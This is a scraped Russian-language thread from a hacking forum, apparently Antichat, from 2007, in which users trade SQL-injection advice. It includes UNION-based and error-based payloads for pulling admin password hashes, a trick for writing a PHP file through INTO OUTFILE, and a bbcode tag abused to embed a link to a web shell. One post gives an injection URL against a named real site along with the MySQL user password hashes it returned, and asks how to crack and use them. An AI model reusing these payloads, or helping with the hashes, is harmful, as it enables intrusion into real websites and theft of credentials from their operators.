27.04.2015, 19:28
|
|
Познавший АНТИЧАТ
Регистрация: 24.04.2009
Сообщений: 1,730
С нами:
8973026
Репутация:
3256
|
|
|
|
|
06.08.2007, 02:18
|
|
Новичок
Регистрация: 30.07.2007
Сообщений: 3
С нами:
9886435
Репутация:
2
|
|
спасибо за советы,
1. не смог проверить сервак в дауне 8*(**** я понял в чем суть ошибки, просто меня самого смутило что возвращается какой то не однозначный ответ и не 1 и не 0 - поэтому и спрашиваю что за муть....
2. кавычки фильтруются жестко, по формату знаю.... писал через чар, но не выходит.... ругается ошибкой 1062 кажется..... писал что синтаксическая ' без пути - без ничего.....
www.server.com/index.php?id=1 union select 1,char(),3,4,5,6,7,8 into outfile или же from table into outfile полный путь или же просто для теста тупо 1.txt/*
пробовал по всякому, может реально не судьба) поэтому и оставался вариант брута, хз подскажите как правильно запрос написать с лимитом.... where user= ?
благодарю....
|
|
|
|
06.08.2007, 12:33
|
|
Познающий
Регистрация: 05.08.2007
Сообщений: 30
С нами:
9876886
Репутация:
18
|
|
Сообщение от s1mplec0de
кавычки фильтруются жестко
При записи +from+table+into+outfile+ '/путь/к/папке/для/записи/123.php'/* нужны реальные кавычки, char() здесь не поможет, при фильтрации кавычек эта схема невозможна.
|
|
|
|
25.08.2007, 10:39
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от Ded MustD!e
1)у меня нет аккаунта на сайте
2)выдает ошибку: Syntax error converting the varchar value 'qwerty' to a column of data type int.
перед qwerty ничего...
1. да причем здесь твой аккаунт имелось ввиду логин который ты получил через скулю...
2. тогда так попробуй (и чтоб вопросов не возникло смотри п.1):
Код:
1+or+1=(SELECT+TOP+1+convert(int,PassHash%2b'%20qw erty')+from+admin where Login='логин который ты получил')--
хотя точно тебе никто нескажет... остается угадывать, вот если б ты линк дал со скулей, тогда бы помогли скорее всего
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 25.08.2007 в 10:51..
|
|
|
|
25.08.2007, 13:15
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
С нами:
9869315
Репутация:
11
|
|
Сообщение от Ded MustD!e
1)у меня нет аккаунта на сайте
2)выдает ошибку: Syntax error converting the varchar value 'qwerty' to a column of data type int.
перед qwerty ничего...
1+or+1=(SELECT+TOP+1+PassHash+from+admin where Login='твой логин')--
Он имел виду логин который ты сам смог нарыть,администратора или ещё кого... 
|
|
|
|
25.08.2007, 14:02
|
|
Новичок
Регистрация: 11.08.2007
Сообщений: 25
С нами:
9869315
Репутация:
11
|
|
У меня вопрос таков...
На кое каком движке я обнаружел что ббтэг не соовсем написан правельно,и поэтому можно что то намутить.
Поскольку я не спец,то решил посоветоватся тут.
тэг [mp3]тут ссылка на файл[/mp3]
возможно ставить любую ссылку,тоесть без начало http:// и без конца .mp3 .
К примеру
Код:
[mp3]http://address.com/shell.php?hack=now[/mp3]
в результате в коде сайта это выглядит так
Код HTML:
<embed autostart="false" loop="false" controller="true" width="220" height="42" src=http://address.com/shell.php?hack=http://address.com/shell.php?hack=now></embed>
Ну а теперь вопрос,что можно с этим сделать ?
P.S: все различные ковычки ( ' " < >) он фильтрует. но можно обойти ещё и через flash файлы. работает а так же ббтэг [swf]ссылка[/swf] .
Где можно достать гид по созданию flash атаки,что бы работал с javascript .
Последний раз редактировалось Nazaret2005; 25.08.2007 в 14:21..
|
|
|
|
02.10.2007, 12:15
|
|
Участник форума
Регистрация: 07.08.2007
Сообщений: 139
С нами:
9874372
Репутация:
138
|
|
Сообщение от n3m0
Спасибо. Где можна почитать про Load_file(char()) ??
А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку
|
|
|
|
02.10.2007, 16:38
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
С нами:
9828237
Репутация:
778
|
|
Сообщение от phol1eadeux
А что тут непонятного. Главное знать какой файл открывать. При фильтрации ковычек кодируешь строку
добавлю, кодировать можно тут -> _http://h4k.in/encoding/index.php вставляешь нужный текст, выбираешь способ кодирования, например, to SQL HEX()
|
|
|
|
06.11.2007, 18:36
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от gemaglabin
Обьявляется миниконкурс на запрос с Order By , приз - плюсы посетивших страницу.
Гыыы я уже начал:
вот описание подобной инъекции в движке рейтинга сайтов:
http://forum.antichat.ru/thread51884.html
еще наглядный пример инъекции после order by в движке статистики psychostat
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 06.11.2007 в 18:40..
|
|
|
|
07.11.2007, 13:30
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
С нами:
10126406
Репутация:
206
|
|
у меня при таком запросе
http://www.aphoto.ru/news/news.php?nid=-23+union+select+1,2,mysql.user.password,4+from+mys ql.user/*
сайт выдаёт такие хеши:
*0380AF57CC89BDDCEB2E4F020087C5660FB8467C
*52868E15C27788B69F9716CF4C3762C430D7FA49
*1AEF7A19D6DE950A96EE5CCDD3388618C30C95E6
*7EBF4B5C89AA3609F2AD90A4D19046F30C15FF9B
*7EF015DF6D56998DC460036F742293B666BCBDA4
у меня вопрос, какого типа эти хеши, на мд5 непохоже, и от чего они, как я могу их испольховать когда расшифрую
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
